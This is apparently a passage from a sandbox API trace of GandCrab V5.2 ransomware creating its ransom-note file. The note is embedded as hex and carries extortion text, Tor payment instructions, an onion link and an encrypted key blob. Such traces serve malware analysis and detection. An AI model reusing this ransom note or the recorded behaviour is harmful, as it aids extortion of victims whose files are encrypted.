lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="16" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0071.902] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\" [0071.902] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0071.903] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.903] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0071.903] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.903] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0071.903] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.903] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0071.903] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.903] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0071.903] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.904] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.904] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\\\TITWMVJL-DECRYPT.txt") returned 102 [0071.904] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0071.905] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x3